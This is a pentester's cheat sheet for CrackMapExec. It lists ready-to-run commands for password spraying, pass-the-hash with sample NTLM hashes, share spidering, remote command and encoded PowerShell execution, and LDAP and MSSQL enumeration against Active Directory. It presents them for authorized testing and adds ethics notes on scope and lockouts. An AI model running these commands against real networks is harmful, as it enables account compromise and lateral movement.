CyberCheatsheets

CrackMapExec Cheat Sheet

Swiss-army SMB/WinRM/LDAP/MSSQL tool for AD enumeration and credential testing.

Active Directory & WindowsadlateralsmbspraywinrmUpdated 2026-06-02

Overview

CrackMapExec (CME) automates Windows network tasks: credential validation, SMB shares, command execution, LDAP queries, and more. It is a staple in authorized internal penetration tests. Ethics: spraying, pass-the-hash, and execution modules affect production AD—scope, timing, and lockout policies must be agreed in writing.

Install

sudo apt install crackmapexec

or pipx:

pipx install crackmapexec
cme --version

Essential commands

cme smb 10.10.10.0/24 -u user -p 'Password1!'
cme smb targets.txt -u users.txt -p 'Password1!' --continue-on-success
cme winrm 10.10.10.10 -u administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
cme ldap 10.10.10.1 -u user -p pass -d corp.local --users

Common workflows

Password spray (careful) —

cme smb 10.10.10.0/24 -u users.txt -p 'Spring2026!' --no-bruteforce
cme smb dc01.corp.local -u user@corp.local -p 'Password1!' -d corp.local

Pass-the-hash —

cme smb 10.10.10.0/24 -u administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0
cme smb 10.10.10.5 -u admin -H :8846f7eaee8fb117ad06bdd830b7586c --local-auth

Shares and spider —

cme smb 10.10.10.5 -u user -p pass --shares
cme smb 10.10.10.5 -u user -p pass -M spider_plus -o OUTPUT_FOLDER=/tmp/out

Command execution (admin) —

cme smb 10.10.10.10 -u administrator -p pass -x 'whoami /all'
cme smb 10.10.10.10 -u admin -p pass -X 'powershell -enc <base64>'

LDAP enumeration —

cme ldap 10.10.10.1 -u user -p pass -d corp.local --users
cme ldap 10.10.10.1 -u user -p pass -d corp.local --groups
cme ldap 10.10.10.1 -u user -p pass -M get-desc-users

Database —

cme mssql 10.10.10.20 -u sa -p 'Password1!' -d master

Flags reference

-u / -p

Username / password

-H

NTLM hash

-d

Domain

--local-auth

Local account on target

-M

Module

-o

Module option

-x / -X

CMD / PowerShell

--continue-on-success

Don't stop on valid cred

Tips

  • Ethics: one password per spray round; watch badpwdcount; use --no-bruteforce where appropriate.
  • Green + in output = valid cred; log to --log for reporting.
  • CME is largely superseded by NetExec (nxc) for new features—syntax is similar; verify your install.
  • Store loot under engagement-specific folders; hashes are sensitive data.

References

Related cheat sheets